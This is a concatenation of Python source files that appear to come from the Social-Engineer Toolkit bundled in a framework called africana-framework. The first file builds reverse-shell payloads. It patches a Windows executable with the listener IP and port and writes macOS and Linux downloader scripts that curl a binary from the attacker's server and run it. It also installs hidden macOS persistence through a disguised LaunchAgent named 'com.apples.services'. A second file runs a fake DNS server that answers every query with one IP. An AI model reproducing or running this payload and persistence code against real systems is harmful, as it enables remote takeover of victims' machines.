webserver = ipaddr
else:
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input(
setprompt("0", "IP address to connect back on for the reverse listener"))
update_options("IPADDR=" + ipaddr)
webserver = ipaddr
# grab port options from payloadgen.py
if check_options("PORT=") != 0:
port = check_options("PORT=")
else:
port = raw_input(
setprompt("0", "Port you want to use for the connection back"))
# define the main variables here
# generate a random executable name per instance
exe_name = generate_random_string(10, 10) + ".exe"
webserver = webserver + " " + port
# store for later
reverse_connection = webserver
webserver = exe_name + " " + webserver
# this is generated through payloadgen.py and lets SET know if its a RATTE
# payload or SET payload
if os.path.isfile(userconfigpath + "set.payload"):
fileopen = open(userconfigpath + "set.payload", "r")
for line in fileopen:
payload_selection = line.rstrip()
else:
payload_selection = "SETSHELL"
# determine if we want to target osx/nix as well
posix = False
# find if we selected it
if os.path.isfile(userconfigpath + "set.payload.posix"):
# if we have then claim true
posix = True
# if we selected the SET Interactive shell in payloadgen
if payload_selection == "SETSHELL":
# replace ipaddress with one that we need for reverse connection back
fileopen = open("src/payloads/set_payloads/downloader.windows", "rb")
data = fileopen.read()
filewrite = open(userconfigpath + "msf.exe", "wb")
host = int(len(exe_name) + 1) * "X"
webserver_count = int(len(webserver) + 1) * "S"
ipaddr_count = int(len(ipaddr) + 1) * "M"
    filewrite.write(data.replace(host.encode(), (exe_name + "\x00").encode(), 1))
filewrite.close()
fileopen = open(userconfigpath + "msf.exe", "rb")
data = fileopen.read()
filewrite = open(userconfigpath + "msf.exe", "wb")
    filewrite.write(data.replace(webserver_count.encode(), (webserver + "\x00").encode(), 1))
filewrite.close()
fileopen = open(userconfigpath + "msf.exe", "rb")
data = fileopen.read()
filewrite = open(userconfigpath + "msf.exe", "wb")
    filewrite.write(data.replace(ipaddr_count.encode(), (ipaddr + "\x00").encode(), 1))
filewrite.close()
# if we selected RATTE in our payload selection
if payload_selection == "RATTE":
fileopen = open("src/payloads/ratte/ratte.binary", "rb")
data = fileopen.read()
filewrite = open(userconfigpath + "msf.exe", "wb")
host = int(len(ipaddr) + 1) * "X"
rPort = int(len(str(port)) + 1) * "Y"
    filewrite.write(data.replace(host.encode(), (ipaddr + "\x00").encode(), 1))
filewrite.close()
fileopen = open(userconfigpath + "msf.exe", "rb")
data = fileopen.read()
filewrite = open(userconfigpath + "msf.exe", "wb")
    filewrite.write(data.replace(rPort.encode(), (str(port) + "\x00").encode(), 1))
filewrite.close()
print_status("Done, moving the payload into the action.")
if upx_encode == "ON" or upx_encode == "on":
# core upx
pass
if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
os.remove(userconfigpath + "web_clone/msf.exe")
if os.path.isfile(userconfigpath + "msf.exe"):
shutil.copyfile(userconfigpath + "msf.exe", userconfigpath + "web_clone/msf.exe")
if payload_selection == "SETSHELL":
if os.path.isfile(userconfigpath + "web_clone/x"):
os.remove(userconfigpath + "web_clone/x")
shutil.copyfile("%s/src/payloads/set_payloads/shell.windows" %
(definepath), userconfigpath + "web_clone/x")
# if we are targeting nix
if posix == True:
    print_info(
        "Targeting OSX/Linux (POSIX-based) as well. Prepping the posix payload...")
filewrite = open(userconfigpath + "web_clone/mac.bin", "w")
payload_flags = webserver.split(" ")
# grab osx binary name
osx_name = generate_random_string(10, 10)
downloader = "#!/bin/sh\ncurl -C -O http://%s/%s > /tmp/%s\nchmod +x /tmp/%s\n./tmp/%s %s %s &" % (
payload_flags[1], osx_name, osx_name, osx_name, osx_name, payload_flags[1], payload_flags[2])
filewrite.write(downloader + "\n")
persistence = check_config("ENABLE_PERSISTENCE_OSX=").lower()
if persistence == "on":
# modified persistence osx from
# http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
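        # The commands appended below make the generated mac.bin copy the
        # payload into ~/Library/.hidden on the victim and register a
        # LaunchAgent plist (com.apples.services) that re-runs it at login
        # and every 60 seconds.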
filewrite.write(r"mkdir ~/Library/.hidden")
filewrite.write("\n")
filewrite.write("cp /tmp/%s ~/Library/.hidden" % (osx_name))
filewrite.write("\n")
filewrite.write(r"echo '#!/bin/bash' > ~/Library/.hidden/connect.sh")
filewrite.write("\n")
filewrite.write("echo './%s %s %s &' >> ~/Library/.hidden/connect.sh" %
(osx_name, payload_flags[1], payload_flags[2]))
filewrite.write("\n")
filewrite.write(
r"echo 'chmod +x ~/Library/.hidden/connect.sh' >> ~/Library/.hidden/connect.sh")
filewrite.write("\n")
filewrite.write(r"mkdir ~/Library/LaunchAgents")
filewrite.write("\n")
filewrite.write(
"echo '<plist version=\"1.0\">' > ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<dict>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<key>Label</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<string>com.apples.services</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<key>ProgramArguments</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<array>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<string>/bin/sh</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
"echo '<string>'$HOME'/Library/.hidden/connect.sh</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '</array>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<key>RunAtLoad</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<true/>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<key>StartInterval</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<integer>60</integer>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<key>AbandonProcessGroup</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<true/>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '</dict>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '</plist>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"chmod 600 ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"launchctl load ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.close()
# grab nix binary name
#linux_name = check_options("NIX.BIN=")
linux_name = generate_random_string(10, 10)
downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (
payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1], payload_flags[2])
filewrite = open(userconfigpath + "web_clone/nix.bin", "w")
filewrite.write(downloader)
filewrite.close()
shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.osx",
userconfigpath + "web_clone/%s" % (osx_name))
shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.linux",
userconfigpath + "web_clone/%s" % (linux_name))
# copy over the downloader scripts
osx_down = check_options("MAC.BIN=")
lin_down = check_options("NIX.BIN=")
shutil.copyfile(userconfigpath + "web_clone/nix.bin",
userconfigpath + "web_clone/%s" % (lin_down))
shutil.copyfile(userconfigpath + "web_clone/mac.bin",
userconfigpath + "web_clone/%s" % (osx_down))
# check to see if we are using a staged approach or direct shell
stager = check_config("SET_SHELL_STAGER=").lower()
if stager == "off" or payload_selection == "SETSHELL_HTTP":
# only trigger if we are using the SETSHELL
if payload_selection == "SETSHELL" or payload_selection == "SETSHELL_HTTP":
# ensure that index.html is really there
if os.path.isfile(userconfigpath + "web_clone/index.html"):
print_status(
"Stager turned off, prepping direct download payload...")
fileopen = open(userconfigpath + "web_clone/index.html", "r")
filewrite = open(userconfigpath + "web_clone/index.html.3", "w")
data = fileopen.read()
# replace freehugs with ip and port
data = data.replace("freehugs", reverse_connection)
filewrite.write(data)
filewrite.close()
time.sleep(1)
# here we remove old stuff and replace with everything we need to
# be newer
if payload_selection == "SETSHELL":
try:
if os.path.isfile(userconfigpath + "web_clone/index.html"):
os.remove(userconfigpath + "web_clone/index.html")
shutil.copyfile(userconfigpath + "web_clone/index.html.3",
userconfigpath + "web_clone/index.html")
if os.path.isfile(userconfigpath + "web_clone/index.html.3"):
os.remove(userconfigpath + "web_clone/index.html.3")
if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
os.remove(userconfigpath + "web_clone/msf.exe")
shutil.copyfile(userconfigpath + "web_clone/x",
userconfigpath + "web_clone/msf.exe")
shutil.copyfile(
userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
if os.path.isfile(userconfigpath + "msf.exe"):
os.remove(userconfigpath + "msf.exe")
shutil.copyfile(
userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
# catch errors, will convert to log later
except Exception as error:
log(error)
# if we are using the HTTP reverse shell then lets use this
if payload_selection == "SETSHELL_HTTP":
try:
if os.path.isfile(userconfigpath + "web_clone/index.html"):
os.remove(userconfigpath + "web_clone/index.html")
shutil.copyfile(userconfigpath + "web_clone/index.html.3",
userconfigpath + "web_clone/index.html")
if os.path.isfile(userconfigpath + "web_clone/index.html.3"):
os.remove(userconfigpath + "web_clone/index.html.3")
if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
os.remove(userconfigpath + "web_clone/msf.exe")
shutil.copyfile(
"src/payloads/set_payloads/http_shell.binary", userconfigpath + "web_clone/msf.exe")
shutil.copyfile(
userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
if os.path.isfile(userconfigpath + "msf.exe"):
os.remove(userconfigpath + "msf.exe")
shutil.copyfile(
userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
# catch errors, will convert to log later
except Exception as error:
log(error)
| 14,808 | Python | .py | 306 | 39.114379 | 125 | 0.610339 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,840 | minifakedns.py | CHEGEBB_africana-framework/externals/set/src/core/minifakedns.py | #!/usr/bin/env python
"""
SET core PyFakeMiniDNS server implementation.
Slightly modified implementation of Francisco Santos's PyfakeminiDNS
script designed to run as a thread and handle various additional
system configuration tasks, if necessary in the running environment,
along with a few implementation considerations specifically for SET.
"""
import os
import socket
import subprocess
import sys
import threading
# We need this module variable so the helper functions can be called
# from outside of this module, e.g., during SET startup and cleanup.
dns_server_thread = None
def start_dns_server(reply_ip):
"""
Helper function, intended to be called from other modules.
Args:
reply_ip (string): IPv4 address in dotted quad notation to use in all answers.
"""
global dns_server_thread
dns_server_thread = MiniFakeDNS(kwargs={'port': 53, 'ip': reply_ip})
dns_server_thread.start()
def stop_dns_server():
"""
Helper function, intended to be called from other modules.
"""
dns_server_thread.stop()
dns_server_thread.join()
dns_server_thread.cleanup()
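# Illustrative usage of the two helpers above (not part of the original SET
# call flow; the IP address below is only an example value):
#
#   start_dns_server('10.0.0.5')   # answer every DNS query with 10.0.0.5
#   ...run the attack / web server...
#   stop_dns_server()              # stop the thread and undo any resolv.conf changes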
class DNSQuery:
"""
A DNS query (that can be parsed as binary data).
See original for reference, but note there have been changes:
https://code.activestate.com/recipes/491264-mini-fake-dns-server/
Among the changes are variables names that have been translated
to English from their original Spanish.
"""
def __init__(self, data):
"""
Args:
data (bytes): The binary data of the DNS packet from the wire.
"""
self.data = data
# The domain name the client is querying the DNS for.
self.domain = ''
# Parse DNS packet headers.
txn_id = data[:2] # DNS transaction ID, two bytes.
flags = data[2:4] # DNS flags, also two bytes.
# To determine whether or not this DNS packet is a query that
# we should respond to, we need to examine the "QR" field and
# the "opcode" field. Together, these make up five bits, but
# they are the left-most bits (most-significant bits) in the
# first byte of the two-byte Flags field. An ASCII diagram:
#
# X XXXX ...
# ^ ^
# | \- The opcode bits are here.
# |
# The QR bit.
#
# To read them meaningfully, we first discard the three bits
# in the rightmost (least significant) position by performing
# a 3-place bitwise right shift, which in python is the `>>`
# operator. At that point, we have a byte value like this:
#
# 000 X XXXX
# ^ ^
# | \- The opcode bits are here.
# |
# The QR bit.
#
# Now that the most significant bits are all zero'ed out, we
# can test the values of the unknown bits to see if they are
# representing a standard query.
#
# In DNS, a standard query has the opcode field set to zero,
# so all the bits in the opcode field should be 0. Meanwhile,
# the QR field should also be a 0, representing a DNS query
# rather than a DNS reply. So what we are hoping to see is:
#
# 000 0 0000
#
# To test for this reliably, we do a bitwise AND with a value
# of decimal 31, which is 11111 in binary, exactly five bits:
#
# 00000000 (Remember, 0 AND 1 equals 0.)
# AND 00011111
# ------------
# 00000000 = decimal 0
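        #
        # A concrete sanity check (illustrative values, not taken from a
        # capture): a typical query arrives with flags 0x0100 -- only the
        # RD bit set -- so (0x01 >> 3) & 31 == 0 and we answer it. A reply
        # has QR set, e.g. a first flags byte of 0x81, so
        # (0x81 >> 3) & 31 == 16 and we ignore it.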
#
# In one line of Python code, we get the following:
kind = (flags[0] >> 3) & 31 # Opcode is in bits 4, 5, 6, and 7 of first byte.
# QR bit is 8th bit, but it should be 0.
# And now, we test to see if the result
if 0 == kind: # was a standard query.
# The header of a DNS packet is exactly twelve bytes long,
# meaning that the very start of the first DNS question
# will always begin at the same offset.
offset = 12 # The first question begins at the 13th byte.
# The DNS protocol encodes domain names as a series of
# labels. Each label is prefixed by a single byte denoting
# that label's length.
length = data[offset]
while 0 != length:
self.domain += data[offset + 1 : offset + length + 1].decode() + '.'
offset += length + 1
length = data[offset]
def response(self, ip):
"""
Construct a DNS reply packet with a given IP address.
TODO: This responds incorrectly to EDNS queries that make use
              of the OPT pseudo-record type. Specifically, the pointer is
              wrong because we do not check the length of the original
query we received. Instead, we should note the length of
the original packet until the end of the first question,
and truncate (i.e., drop, ignore) the remainder.
For now, what this actually means is that testing this
server using a recent version of `dig(1)` will fail
unless you use the `+noedns` query option. For example:
dig @127.0.0.1 example.com +noedns
Simpler or older DNS utilities such as `host(1)` are
probably going to work.
Args:
ip (string): IP address to respond with.
"""
packet = b''
if self.domain:
packet += self.data[:2] + b'\x81\x80'
packet += self.data[4:6] + self.data[4:6] + b'\x00\x00\x00\x00' # Questions and Answers Counts
packet += self.data[12:] # Original Domain Name Question
packet += b'\xc0\x0c' # Pointer to domain name
packet += b'\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # Response type, ttl and resource data length -> 4 bytes
packet += bytes([int(x) for x in ip.split('.')]) # 4 bytes of IP.
return packet
class MiniFakeDNS(threading.Thread):
"""
The MiniFakeDNS server, written to be run as a Python Thread.
"""
def __init__(self, group=None, target=None, name=None,
args=(), kwargs=None):
super(MiniFakeDNS, self).__init__(
group=group, target=target, name=name)
self.args = args
self.kwargs = kwargs
# The IPs address we will respond with.
self.ip = kwargs['ip']
# The port number we will attempt to bind to. Default is 53.
self.port = kwargs['port']
# Remember which configuration we usurped, if any. Used to cleanup.
self.cede_configuration = None
# A flag to indicate that the thread should exit.
self.stop_flag = False
def run(self):
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as udps:
udps.setblocking(False)
try:
udps.bind(('', self.port))
except OSError as e:
if 'Address already in use' == e.strerror and os.path.exists('/etc/resolv.conf'):
# We can't listen on port 53 because something else got
# there before we did. It's probably systemd-resolved's
# DNS stub resolver, but since we are probably running as
# the `root` user, we can fix this ourselves.
if 'stub-resolv.conf' in os.path.realpath('/etc/resolv.conf'):
self.usurp_systemd_resolved()
self.cede_configuration = self.cede_to_systemd_resolved
# Try binding again, now that the port might be available.
udps.bind(('', self.port))
while not self.stop_flag:
try:
data, addr = udps.recvfrom(1024)
p = DNSQuery(data)
udps.sendto(p.response(self.ip), addr)
except BlockingIOError:
pass
print("Exiting the DNS Server..")
sys.exit()
def cleanup(self):
if self.cede_configuration is not None:
self.cede_configuration()
def stop(self):
"""
Signals to the DNS server thread to stop.
"""
self.stop_flag = True
def usurp_systemd_resolved(self):
"""
Helper function to get systemd-resolved out of the way when it
is listening on 127.0.0.1:53 and we are trying to run SET's
own DNS server.
"""
try:
os.mkdir('/etc/systemd/resolved.conf.d')
except (OSError, FileExistsError):
pass
with open('/etc/systemd/resolved.conf.d/99-setoolkit-dns.conf', 'w') as f:
f.write("[Resolve]\nDNS=9.9.9.9\nDNSStubListener=no")
os.rename('/etc/resolv.conf', '/etc/resolv.conf.original')
os.symlink('/run/systemd/resolve/resolv.conf', '/etc/resolv.conf')
subprocess.call(['systemctl', 'restart', 'systemd-resolved.service'])
def cede_to_systemd_resolved(self):
"""
Helper function to cede system configuration back to systemd-resolved
after we have usurped control over DNS configuration away from it.
"""
os.remove('/etc/systemd/resolved.conf.d/99-setoolkit-dns.conf')
os.remove('/etc/resolv.conf')
os.rename('/etc/resolv.conf.original', '/etc/resolv.conf')
subprocess.call(['systemctl', 'restart', 'systemd-resolved.service'])
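
# ---------------------------------------------------------------------------
# Illustrative self-test (not part of the original module): hand-build a
# minimal standard query for "example.com" and feed it through DNSQuery.
# The transaction ID (0xabcd) and the answer IP (192.0.2.1) are arbitrary
# example values.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    sample_query = (b'\xab\xcd'                          # transaction ID
                    b'\x01\x00'                          # flags: standard query, RD set
                    b'\x00\x01\x00\x00\x00\x00\x00\x00'  # 1 question, no answer/authority/additional records
                    b'\x07example\x03com\x00'            # QNAME as length-prefixed labels
                    b'\x00\x01\x00\x01')                 # QTYPE=A, QCLASS=IN
    query = DNSQuery(sample_query)
    print("Parsed domain: %s" % query.domain)            # -> example.com.
    reply = query.response('192.0.2.1')
    print("Reply ends with the IP bytes: %r" % reply[-4:])   # -> b'\xc0\x00\x02\x01'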
| 9,739 | Python | .py | 212 | 35.882075 | 122 | 0.588774 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,841 | setcore.py | CHEGEBB_africana-framework/externals/set/src/core/setcore.py | # !/usr/bin/env python3
#
# Centralized core modules for SET
#
#
import re
import sys
import socket
import subprocess
import shutil
import os
import time
import datetime
import random
import string
import inspect
import base64
from src.core import dictionaries
import src.core.minifakedns
import io
import trace
# python 2 and 3 compatibility
try:
from urllib.request import urlopen
except ImportError:
from urllib import urlopen
import multiprocessing
if sys.version_info >= (3, 0):
# python 3 removes reduce from builtin and into functools
from functools import *
# needed for backwards compatibility of python2 vs 3 - need to convert to
# threading eventually
try:
import thread
except ImportError:
import _thread as thread
try:
raw_input
except:
raw_input = input
# check to see if we have python-pycrypto
try:
from Cryptodome.Cipher import AES
except ImportError:
print(
"[!] The python-pycryptodome python module not installed. You will lose the ability for encrypted communications.")
pass
# get the main SET path
def definepath():
if check_os() == "posix":
if os.path.isfile("setoolkit"):
return os.getcwd()
else:
return "/usr/share/setoolkit/"
else:
return os.getcwd()
# check operating system
def check_os():
if os.name == "nt":
operating_system = "windows"
if os.name == "posix":
operating_system = "posix"
return operating_system
#
# Class for colors
#
if check_os() == "posix":
class bcolors:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERL = '\033[4m'
ENDC = '\033[0m'
backBlack = '\033[40m'
backRed = '\033[41m'
backGreen = '\033[42m'
backYellow = '\033[43m'
backBlue = '\033[44m'
backMagenta = '\033[45m'
backCyan = '\033[46m'
backWhite = '\033[47m'
def disable(self):
self.PURPLE = ''
self.CYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.ENDC = ''
self.BOLD = ''
self.UNDERL = ''
self.backBlack = ''
self.backRed = ''
self.backGreen = ''
self.backYellow = ''
self.backBlue = ''
self.backMagenta = ''
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
# if we are windows or something like that then define colors as nothing
else:
class bcolors:
PURPLE = ''
CYAN = ''
DARKCYAN = ''
BLUE = ''
GREEN = ''
YELLOW = ''
RED = ''
BOLD = ''
UNDERL = ''
ENDC = ''
backBlack = ''
backRed = ''
backGreen = ''
backYellow = ''
backBlue = ''
backMagenta = ''
backCyan = ''
backWhite = ''
def disable(self):
self.PURPLE = ''
self.CYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.ENDC = ''
self.BOLD = ''
self.UNDERL = ''
self.backBlack = ''
self.backRed = ''
self.backGreen = ''
self.backYellow = ''
self.backBlue = ''
self.backMagenta = ''
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
# this will be the home for the set menus
def setprompt(category, text):
# if no special prompt and no text, return plain prompt
if category == '0' and text == "":
return bcolors.GREEN + "(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.GREEN + ")# " + bcolors.ENDC
# if the loop is here, either category or text was positive
# if it's the category that is blank...return prompt with only the text
if category == '0':
return bcolors.GREEN + "(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.GREEN + ")# " + bcolors.ENDC
# category is NOT blank
else:
# initialize the base 'set' prompt
prompt = bcolors.GREEN + "(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.GREEN + ")# " + bcolors.ENDC
# if there is a category but no text
if text == "":
for level in category:
level = dictionaries.category(level)
prompt += ":" + bcolors.UNDERL + \
bcolors.DARKCYAN + level + bcolors.ENDC
promptstring = str(prompt)
promptstring += " > "
return promptstring
# if there is both a category AND text
else:
# iterate through the list received
for level in category:
level = dictionaries.category(level)
prompt += ":" + bcolors.UNDERL + \
bcolors.DARKCYAN + level + bcolors.ENDC
promptstring = str(prompt)
promptstring = promptstring + " > " + text + ":"
return promptstring
def yesno_prompt(category, text):
valid_response = False
while not valid_response:
response = raw_input(setprompt(category, text))
response = str.lower(response)
if response == "no" or response == "n":
response = "NO"
valid_response = True
elif response == "yes" or response == "y":
response = "YES"
valid_response = True
else:
print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
return response
def return_continue():
print(("\n Press " + bcolors.RED +
"<return> " + bcolors.ENDC + "to continue"))
pause = raw_input()
# DEBUGGING #############
# ALWAYS SET TO ZERO BEFORE COMMIT!
DEBUG_LEVEL = 0
# 0 = Debugging OFF
# 1 = debug imports only
# 2 = debug imports with pause for <ENTER>
# 3 = imports, info messages
# 4 = imports, info messages with pause for <ENTER>
# 5 = imports, info messages, menus
# 6 = imports, info messages, menus with pause for <ENTER>
debugFrameString = '-' * 72
def debug_msg(currentModule, message, msgType):
if DEBUG_LEVEL == 0:
pass # stop evaluation efficiently
else:
if msgType <= DEBUG_LEVEL:
# a bit more streamlined
print(bcolors.RED + "\nDEBUG_MSG: from module '" +
currentModule + "': " + message + bcolors.ENDC)
if DEBUG_LEVEL == 2 or DEBUG_LEVEL == 4 or DEBUG_LEVEL == 6:
raw_input("waiting for <ENTER>\n")
def mod_name():
frame_records = inspect.stack()[1]
calling_module = inspect.getmodulename(frame_records[1])
return calling_module
#
# RUNTIME MESSAGES ############
def print_status(message):
print(bcolors.GREEN + bcolors.BOLD + "[*] " + bcolors.ENDC + str(message))
def print_info(message):
print(bcolors.BLUE + bcolors.BOLD + "[-] " + bcolors.ENDC + str(message))
def print_info_spaces(message):
print(bcolors.BLUE + bcolors.BOLD + " [-] " + bcolors.ENDC + str(message))
def print_warning(message):
print(bcolors.YELLOW + bcolors.BOLD + "[!] " + bcolors.ENDC + str(message))
def print_error(message):
print(bcolors.RED + bcolors.BOLD +
"[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC)
def get_version():
define_version = open("src/core/set.version", "r").read().rstrip()
# define_version = '7.2.3'
return define_version
class create_menu:
def __init__(self, text, menu):
self.text = text
self.menu = menu
print(text)
for i, option in enumerate(menu):
menunum = i + 1
# Check to see if this line has the 'return to main menu' code
match = re.search("0D", option)
# If it's not the return to menu line:
if not match:
if menunum < 10:
print((' %s) %s' % (menunum, option)))
else:
print((' %s) %s' % (menunum, option)))
else:
print('\n 0) Return to Main Menu\n')
return
def detect_public_ip():
"""
Helper function to auto-detect our public IP(v4) address.
"""
rhost = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
rhost.connect(('google.com', 0))
rhost.settimeout(2)
return rhost.getsockname()[0]
def validate_ip(address):
"""
Validates that a given string is an IPv4 dotted quad.
"""
try:
if socket.inet_aton(address):
if len(address.split('.')) == 4:
debug_msg("setcore", "this is a valid IP address", 5)
return True
else:
print_error("This is not a valid IP address...")
raise socket.error
else:
            raise socket.error
except socket.error:
return False
#
# grab the metaspoit path
#
def meta_path():
# DEFINE METASPLOIT PATH
trigger = 0
try:
# pull from config first
msf_path = check_config("METASPLOIT_PATH=")
if not msf_path.endswith("/"):
msf_path = msf_path + "/"
if os.path.isfile(msf_path + "msfconsole"):
trigger = 1
# if we are using just the standard path for msfconsole
if os.path.isfile("/usr/bin/msfconsole"):
if trigger == 0:
msf_path = "/usr/bin/"
trigger = 1
# specific for backbox linux
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
if trigger == 0:
msf_path = "/opt/metasploit-framework/"
trigger = 1
# specific for kali linux
if os.path.isfile("/opt/metasploit/apps/pro/msf3/msfconsole"):
# left blank since you can call launcher and ruby1.9 - 2x issues
# are there
if trigger == 0:
msf_path = ""
trigger = 1
# specific for backtrack5 and other backtrack versions
if os.path.isfile("/opt/framework3/msf3/msfconsole"):
if trigger == 0:
msf_path = "/opt/framework3/msf3/"
trigger = 1
if os.path.isfile("/opt/framework/msf3/msfconsole"):
if trigger == 0:
msf_path = "/opt/framework/msf3/"
trigger = 1
if os.path.isfile("/opt/metasploit/msf3/msfconsole"):
if trigger == 0:
msf_path = "/opt/metasploit/msf3/"
trigger = 1
# specific for pwnpad and pwnplug (pwnie express)
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
if trigger == 0:
msf_path = "/opt/metasploit-framework/"
trigger = 1
# specific for pentesters framework github.com/trustedsec/ptf
if os.path.isfile("/pentest/exploitation/metasploit/msfconsole"):
if trigger == 0:
msf_path = "/pentest/exploitation/metasploit/"
trigger = 1
# Kali linux bleeding edge should return this in order to work
if os.path.isfile("/usr/share/metasploit-framework/msfconsole"):
if trigger == 0:
msf_path = "/usr/share/metasploit-framework/"
trigger = 1
# if we didn't find anything
if trigger == 0:
print_error(
"Metasploit path not found. These payloads will be disabled.")
print_error(
"Please configure Metasploit's path in the /etc/setoolkit/set.config file.")
msf_path = False
except Exception as e:
print_status("Something went wrong. Printing error: " + str(e))
# this is an option if we don't want to use Metasploit period
check_metasploit = check_config("METASPLOIT_MODE=").lower()
if check_metasploit != "on":
msf_path = False
return msf_path
#
# grab the metaspoit path
#
def meta_database():
# DEFINE METASPLOIT PATH
meta_path = open("/etc/setoolkit/set.config", "r").readlines()
for line in meta_path:
line = line.rstrip()
match = re.search("METASPLOIT_DATABASE=", line)
if match:
line = line.replace("METASPLOIT_DATABASE=", "")
msf_database = line.rstrip()
return msf_database
#
# grab the interface ip address
#
def grab_ipaddress():
try:
revipaddr = detect_public_ip()
rhost = raw_input(setprompt("0", "IP address or URL (www.ex.com) for the payload listener (LHOST) [" + revipaddr + "]"))
if rhost == "": rhost = revipaddr
except Exception:
rhost = raw_input(setprompt("0", "Enter your interface/reverse listener IP Address or URL"))
if validate_ip(rhost) == False:
while 1:
choice = raw_input(setprompt(["2"], "This is not an IP address. Are you using a hostname? [y/n] "))
if choice == "" or choice.lower() == "y":
print_status("Roger that ghostrider. Using hostnames moving forward (hostnames are 1337, nice job)..")
break
else:
rhost = raw_input(setprompt(["2"], "IP address for the reverse connection [" + rhost + "]"))
if validate_ip(rhost) == True: break
else:
choice = raw_input(setprompt(["2"], "This is not an IP address. Are you using a hostname? [y/n] "))
if choice == "" or choice.lower() == "y":
print_status("Roger that ghostrider. Using hostnames moving forward (hostnames are 1337, nice job)..")
break
# rhost return when verified
return rhost
#
# cleanup old or stale files
#
def cleanup_routine():
try:
# restore original Java Applet
shutil.copyfile("%s/src/html/Signed_Update.jar.orig" %
(definepath()), userconfigpath + "Signed_Update.jar")
if os.path.isfile("newcert.pem"):
os.remove("newcert.pem")
if os.path.isfile(userconfigpath + "interfaces"):
os.remove(userconfigpath + "interfaces")
if os.path.isfile("src/html/1msf.raw"):
os.remove("src/html/1msf.raw")
if os.path.isfile("src/html/2msf.raw"):
os.remove("src/html/2msf.raw")
if os.path.isfile("msf.exe"):
os.remove("msf.exe")
if os.path.isfile("src/html/index.html"):
os.remove("src/html/index.html")
if os.path.isfile(userconfigpath + "Signed_Update.jar"):
os.remove(userconfigpath + "Signed_Update.jar")
if os.path.isfile(userconfigpath + "version.lock"):
os.remove(userconfigpath + "version.lock")
src.core.minifakedns.stop_dns_server()
except:
pass
#
# Update The Social-Engineer Toolkit
#
def update_set():
backbox = check_backbox()
kali = check_kali()
if backbox == "BackBox":
print_status(
"You are running BackBox Linux which already implements SET updates.")
print_status(
"No need for further operations, just update your system.")
time.sleep(2)
elif kali == "Kali":
print_status("You are running Kali Linux which maintains SET updates.")
time.sleep(2)
# if we aren't running Kali or BackBox :(
else:
print_info("Kali or BackBox Linux not detected, manually updating..")
print_info("Updating the Social-Engineer Toolkit, be patient...")
print_info("Performing cleanup first...")
subprocess.Popen("git clean -fd", shell=True).wait()
print_info("Updating... This could take a little bit...")
subprocess.Popen("git pull", shell=True).wait()
